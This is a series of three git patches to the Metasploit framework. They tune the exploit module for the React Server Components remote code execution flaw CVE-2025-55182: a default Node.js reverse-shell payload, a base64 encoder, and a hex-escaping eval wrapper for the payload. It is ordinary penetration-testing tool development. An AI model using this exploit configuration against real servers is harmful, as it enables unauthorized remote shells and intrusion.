From ca2ac75e16430c5b73e8021f9b9d33c58f1295ce Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Fri, 12 Dec 2025 15:22:34 -0800 Subject: [PATCH 1/3] Change react2shell default encoder --- lib/msf/core/payload/nodejs.rb | 2 +- .../multi/http/react2shell_unauth_rce_cve_2025_55182.rb | 8 +++++--- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb index 89190672acf88..296186bc41519 100644 --- a/lib/msf/core/payload/nodejs.rb +++ b/lib/msf/core/payload/nodejs.rb @@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={}) # @param [String] code the javascript code to run # @return [String] a command that invokes "node" and passes the code def nodejs_cmd(code) - "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'" + "node -e 'eval(\"#{code.gsub(/[^a-zA-Z0-9\s]/) { |char| Rex::Text.to_hex(char, '\\x') }}\");'" end end diff --git a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb index 695b4a1994baa..9fd9d78c3c319 100644 --- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb +++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb @@ -32,7 +32,7 @@ def initialize(info = {}) ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'], ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3'] ], - 'Platform' => ['multi'], + 'Platform' => %w[unix linux win], 'Arch' => [ARCH_CMD], 'Targets' => [ [ @@ -40,8 +40,9 @@ def initialize(info = {}) { 'Platform' => ['unix', 'linux'], 'DefaultOptions' => { - 'FETCH_COMMAND' => 'WGET' + 'PAYLOAD' => 'cmd/unix/reverse_nodejs' } + # Tested with cmd/unix/reverse_nodejs # Tested with cmd/unix/reverse_bash # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp } @@ -55,7 +56,8 @@ def initialize(info = {}) ], ], 'Payload' => { - 'BadChars' => '"' + 'BadChars' => '"', + 'Encoder' => 'cmd/base64' }, 'DefaultTarget' => 0, 'DisclosureDate' => '2025-12-03', From ff188b8a5efeb19a56c6409558851cfb5d2ed167 Mon Sep 17 00:00:00 2001 From: jheysel-r7 Date: Mon, 15 Dec 2025 08:08:54 -0800 Subject: [PATCH 2/3] Update regex Co-authored-by: Julien Voisin --- lib/msf/core/payload/nodejs.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb index 296186bc41519..8080f3642ad07 100644 --- a/lib/msf/core/payload/nodejs.rb +++ b/lib/msf/core/payload/nodejs.rb @@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={}) # @param [String] code the javascript code to run # @return [String] a command that invokes "node" and passes the code def nodejs_cmd(code) - "node -e 'eval(\"#{code.gsub(/[^a-zA-Z0-9\s]/) { |char| Rex::Text.to_hex(char, '\\x') }}\");'" + "node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'" end end From 0589121fb93d3d4d6cef30312dcd798c9b4b88af Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Mon, 15 Dec 2025 13:46:15 -0800 Subject: [PATCH 3/3] Update payload options --- .../multi/http/react2shell_unauth_rce_cve_2025_55182.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb index 9fd9d78c3c319..6d6fa41ef2e42 100644 --- a/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb +++ b/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb @@ -57,6 +57,8 @@ def initialize(info = {}) ], 'Payload' => { 'BadChars' => '"', + 'Space' => 131068, + 'DisableNops' => true, 'Encoder' => 'cmd/base64' }, 'DefaultTarget' => 0,